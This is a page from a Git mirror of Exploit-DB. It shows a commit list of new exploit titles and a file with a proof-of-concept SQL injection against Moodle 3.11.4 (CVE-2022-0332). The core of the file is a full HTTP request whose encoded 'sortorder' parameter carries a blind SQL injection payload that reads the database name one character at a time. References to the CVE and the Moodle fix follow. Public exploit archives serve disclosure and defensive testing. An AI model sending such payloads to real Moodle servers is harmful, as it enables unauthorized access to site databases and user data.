bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50700.txt
Offensive Security ad453a2c73 DB: 2022-02-03 
17 changes to exploits/shellcodes

CONTPAQi(R) AdminPAQ 14.0.0 - Unquoted Service Path
Mozilla Firefox 67 - Array.pop JIT Type Confusion
Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)
Ametys CMS v4.4.1 - Cross Site Scripting (XSS)
uBidAuction v2.0.1 - 'Multiple' Cross Site Scripting (XSS)
Chamilo LMS 1.11.14 - Account Takeover
Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated)
WordPress Plugin Domain Check 1.0.16 - Reflected Cross-Site Scripting (XSS) (Authenticated)
Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated)
PHP Restaurants 1.0 - SQLi (Unauthenticated)
Moodle 3.11.4 - SQL Injection
Huawei DG8045 Router 1.0 - Credential Disclosure
PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated)
WordPress Plugin Contact Form Check Tester 1.0.2 - Broken Access Control
WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)
WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS)
WordPress Plugin Learnpress 4.1.4.1 - Arbitrary Image Renaming
2022-02-03 05:01:57 +00:00

30 lines
No EOL
1.3 KiB
Text
Raw Blame History

# Exploit Title: Moodle 3.11.4 - SQL Injection
# Date: 30/01/2022
# Exploit Author: lavclash75
# Vendor Homepage: https://moodle.org/
# Version: Moodle 3.11 to 3.11.4
# CVE: CVE-2022-0332
# POC
```
GET /moodle-3.11.4/webservice/rest/server.php?wstoken=98f7d8003180afbd46ee160fdc05a4fc&wsfunction=mod_h5pactivity_get_user_attempts&moodlewsrestformat=json&h5pactivityid=1&sortorder=%28SELECT%20%28CASE%20WHEN%20%28ORD%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20NCHAR%29%2C0x20%29%29%2C4%2C1%29%29%3E104%29%20THEN%20%27%27%20ELSE%20%28SELECT%205080%20UNION%20SELECT%204100%29%20END%29%29 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0
Host: local.numanturle.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
```
```
```
![PHP](img/orderby.jpg?raw=true "PHP")
![PHP](img/uri.jpg?raw=true "PHP")
![PHP](img/sqlmap.jpg?raw=true "PHP")
# Reference
* [CVE-2022-0332](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0332)
* [Git](https://git.moodle.org/gw?p=moodle.git;a=blobdiff;f=mod/h5pactivity/classes/external/get_user_attempts.php;h=8a27f821bc37f20bafaba6ef436871717b3817a3;hp=216653e93315c4d8ca084fe1e62b2041dece4531;hb=c7a62a8c82219b50589257f79021da1df1a76808;hpb=2ee27313cea0d7073f5a6a35eccdfddcb3a9adad)
Reference in a new issue View git blame Copy permalink